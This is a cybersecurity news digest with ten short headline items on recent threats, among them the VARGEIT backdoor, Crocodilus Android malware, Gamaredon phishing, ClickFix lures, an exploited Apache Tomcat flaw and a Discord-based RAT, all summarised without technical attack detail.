Whispers of espionage echo through the digital corridors as researchers revealed that the Earth Alux APT group has been wielding its VARGEIT backdoor to infiltrate government, tech, and retail sectors across Asia-Pacific and Latin America. Meanwhile, a sly predator slinks onto mobile screens in the form of a new Android malware, Crocodilus, that employs cunning social engineering to coax users into surrendering their cryptocurrency wallet seed phrases. Over in Ukraine, a different storm brews; analysts warned of a Gamaredon phishing campaign using malicious LNK files to unleash a PowerShell downloader, slipping the Remcos backdoor onto systems with surgical precision. Read on for more.
01
The Earth Alux APT group has been using a primary backdoor called VARGEIT to conduct cyber espionage, targeting government, technology, and retail sectors in Asia-Pacific and Latin America.
02
A new Android malware, Crocodilus, uses social engineering to trick users into providing their cryptocurrency wallet seed phrase, allowing attackers to take full control and drain the wallet.
03
A Gamaredon phishing campaign is targeting users in Ukraine with malicious LNK files, which run a PowerShell downloader to deliver the Remcos backdoor.
04
Cybercriminals are using the ClickFix technique to distribute various types of malware, including ransomware, info-stealers, and Qakbot, by tricking users into executing malicious commands disguised as human verification prompts.
05
A threat actor used a malicious Zoom download from a fake website to infiltrate a corporate network, utilizing d3f@ckloader, ultimately deploying Blacksuit ransomware on the ninth day.
06
The CISA released a Malware Analysis Report on a new malware, dubbed RESURGE, that targets CVE-2025-0282 in Ivanti Connect Secure appliances. RESURGE supports SPAWNCHIMERA but uses unique commands that change its behavior.
07
The U.S. Department of Justice (DoJ) seized over $8.2 million worth of Tether cryptocurrency that was pilfered via romance baiting scams.
08
A critical RCE vulnerability, CVE-2025-24813, is being actively exploited in Apache Tomcat servers. This allows file uploads via unauthenticated HTTP PUT requests.
09
A Python-based RAT is exploiting Discord's API capabilities, using it as a C2 infrastructure. The RAT can perform credential theft, remote command execution, system surveillance, and Discord server manipulation.
10
The Privacy Commissioner of Canada introduced an online self-assessment tool to aid businesses and federal institutions in evaluating the risk of significant harm to individuals following a privacy breach.
